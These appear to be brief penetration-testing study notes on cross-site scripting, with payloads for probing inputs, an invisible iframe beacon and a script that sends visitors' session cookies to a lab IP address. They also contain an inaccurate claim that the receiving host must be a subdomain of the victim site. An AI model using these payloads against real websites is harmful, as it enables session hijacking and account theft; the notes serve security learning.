Cross Site Scripting

Identifying XSS Vulernability

The best way to test a website for XSS vulnerability is to inject a piece of JS or HTML code into the comments or any input field. An example would be,

hello";<>

if this piece of code is displayed without the special characters being removed then the page should be vulnerable to XSS. Next, the page can be tested for something more complex,

<script>alert("XSS")</script>

This code should add a prompt to the page.

Content Injection

Content injection can help to inject code into a website from a remote server and it can also help to identify the type of browser that the user is using.

<iframe src=http://10.11.0.4/report height=”0” width=”0”></iframe>

Once the above code is include within a page, say as a comment, when any user visit's the page a request will be sent to the mentioned IP address. A simple netcat server running can capture the request and display the browser details.

Stealing Cookies

Similar to the previous example, the session cookie of the user can also be sent to a remote server when appropriate code is included within the page. The following piece of code when included within the page as comment will send the cookie details of every user visiting the page,

<script>new Image().src="http://10.11.0.4/cool.jpg?output="+document.cookie;</script>

Now, there are certain limitations about the practicality of this code, the website should not have httponly set, as this restricts access for JS to the cookie, and the hosted link for receiving the request should be a sub-domain of the website from which the cookie is being stolen.

BeEF - Browser Exploitation Framework

COMING SOON

Last updated